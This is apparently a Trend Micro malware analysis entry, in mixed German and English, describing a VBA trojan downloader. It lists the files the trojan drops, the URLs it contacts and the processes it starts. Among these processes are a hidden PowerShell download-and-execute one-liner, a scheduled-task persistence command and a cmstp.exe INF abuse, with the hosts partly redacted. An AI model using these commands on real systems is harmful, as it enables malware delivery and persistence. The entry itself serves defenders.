Analyse von: Maria Emreen Viray   

 

Trojan-Downloader.VBA.Agent (IKARUS)

 Plattform:

Windows

 Risikobewertung (gesamt):
 Schadenspotenzial::
 Verteilungspotenzial::
 reportedInfection:
 Trend Micro Lösungen:
Niedrig
Mittel
Hoch
Kritisch

  • Malware-Typ:
    Trojan

  • Zerstrerisch?:
    Nein

  • Verschlsselt?:
     

  • In the wild::
    Ja

  Überblick

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

  Technische Details

Dateigröße: 117,037 bytes
Dateityp: Other
Speicherresiden: Nein
Erste Muster erhalten am: 01 Februar 2022

Übertragungsdetails

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

Schleust die folgenden Dateien ein:

  • %Public%\peee.com
  • %Public%\hahahha.vbs
  • %User Temp%\CMSTP.inf

Fügt die folgenden Prozesse hinzu:

  • %Public%\peee.com http://www.j.mp/akd{BLOCKED}
  • powershell.exe -w h -NoProfile -ExecutionPolicy Bypass -Command (New-Object IO.StreamReader([Net.HttpWebRequest]::Create('https://www.me{BLOCKED}.com/file/ey{BLOCKED}/9.dll/file').GetResponse().GetResponseStream())).ReadToEnd()|I'e'x
  • schtasks /create /sc MINUTE /mo 182 /tn asasdwddasdeyu /F /tr """%Public%/peee.com""""""https://www.me{BLOCKED}.com/file/ch{BLOCKED}/9.htm/file"""
  • "%Windows%\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
  • "%System%\cmstp.exe" /au %User Temp%\CMSTP.inf
  • Wscript %Public%\hahahha.vbs
  • "%System%\Wscript.exe" "%Public%\hahahha.vbs" /elevate

Andere Details

It connects to the following possibly malicious URL:

  • http://www.j.mp/akd{BLOCKED}
  • http://bit.ly/akd{BLOCKED}
  • https://www.me{BLOCKED}.com/file/4v{BLOCKED}/9.htm/file
  • https://www.me{BLOCKED}.com/file/ey{BLOCKED}/9.dll/file
  • https://www.me{BLOCKED}.com/file/vg{BLOCKED}/F2.vbs/file